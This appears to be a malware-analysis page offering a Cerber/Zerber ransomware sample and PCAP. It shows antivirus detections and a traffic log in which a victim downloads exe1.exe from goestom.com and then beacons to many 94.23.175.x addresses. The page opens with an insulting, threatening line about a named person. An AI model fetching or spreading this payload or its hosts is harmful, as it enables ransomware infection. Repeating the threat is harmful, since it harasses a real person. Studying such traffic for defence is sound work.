Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

Cerber/Zerber Ransomware Malware File Sample PCAP Download Traffic Analysis goestom.com exe1.exe

Download Attachments

  • 1 pcap exe1
    Date added: May 9, 2017 1:16 am Added by: admin File size: 186 KB Downloads: 142

 

SHA256: 681dd9f73db50422536b422e83d0dabfe172e9e94b483b6df5f6a09226856c37
File name: exe1.exe
Detection ratio: 23 / 59

 

Ad-Aware Trojan.GenericKD.5015659 20170509
AegisLab Ransom.Cerber.Smjak!c 20170508
Arcabit Trojan.Generic.D4C886B 20170509
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170503
BitDefender Trojan.GenericKD.5015659 20170509
CrowdStrike Falcon (ML) malicious_confidence_98% (W) 20170130
Emsisoft Trojan.GenericKD.5015659 (B) 20170508
Endgame malicious (high confidence) 20170503
F-Secure Trojan.GenericKD.5015659 20170508
GData Trojan.GenericKD.5015659 20170508
Invincea trojandownloader.win32.unruy.i 20170413
Kaspersky Trojan-Ransom.Win32.Zerber.ebdr 20170508
Malwarebytes Ransom.Cerber 20170509
McAfee Artemis!8C290A321DCB 20170509
McAfee-GW-Edition BehavesLike.Win32.Dropper.hc 20170508
eScan Trojan.GenericKD.5015659

2017-05-08 19:44:02.346328 IP 192.168.1.102.54506 > 185.23.21.18.80: Flags [P.], seq 0:420, ack 1, win 256, length 420: HTTP: GET /language/overrides/counter/exe1.exe HTTP/1.1
E…..@…V….f…….P…[.<..P…r…GET /language/overrides/counter/exe1.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: goestom.com
Connection: Keep-Alive

2017-05-08 19:44:22.638417 IP 192.168.1.102.54094 > 94.23.175.160.6893: UDP, length 14
E..*……RW…f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.638506 IP 192.168.1.102.54094 > 94.23.175.161.6893: UDP, length 14
E..*”…..IC…f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.638616 IP 192.168.1.102.54094 > 94.23.175.162.6893: UDP, length 14
E..*^+………f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.638701 IP 192.168.1.102.54094 > 94.23.175.163.6893: UDP, length 14
E..*g:………f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.638819 IP 192.168.1.102.54094 > 94.23.175.164.6893: UDP, length 14
E..*7…..4….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.638941 IP 192.168.1.102.54094 > 94.23.175.165.6893: UDP, length 14
E..*A…..*….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639025 IP 192.168.1.102.54094 > 94.23.175.166.6893: UDP, length 14
E..*|t………f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639128 IP 192.168.1.102.54094 > 94.23.175.167.6893: UDP, length 14
E..*.w….f….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639217 IP 192.168.1.102.54094 > 94.23.175.168.6893: UDP, length 14
E..*
…..a(…f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639322 IP 192.168.1.102.54094 > 94.23.175.169.6893: UDP, length 14
E..*……Z….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639407 IP 192.168.1.102.54094 > 94.23.175.170.6893: UDP, length 14
E..*OT………f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639510 IP 192.168.1.102.54094 > 94.23.175.171.6893: UDP, length 14
E..*V_………f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639599 IP 192.168.1.102.54094 > 94.23.175.172.6893: UDP, length 14
E..*)…..B….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639698 IP 192.168.1.102.54094 > 94.23.175.173.6893: UDP, length 14
E..*0)….;….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639786 IP 192.168.1.102.54094 > 94.23.175.174.6893: UDP, length 14
E..*m……S…f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.639907 IP 192.168.1.102.54094 > 94.23.175.175.6893: UDP, length 14
E..*t……K…f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.640000 IP 192.168.1.102.54094 > 94.23.175.176.6893: UDP, length 14
E..*”G….I….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.640104 IP 192.168.1.102.54094 > 94.23.175.177.6893: UDP, length 14
E..*.:….P….f^….N……b8ffd01f27a8b3….
2017-05-08 19:44:22.640187 IP 192.168.1.102.54094 > 94.23.175.178.6893: UDP, length 14
E..*e……!…f^….N……b8ffd01f27a8b3….

Leave a Reply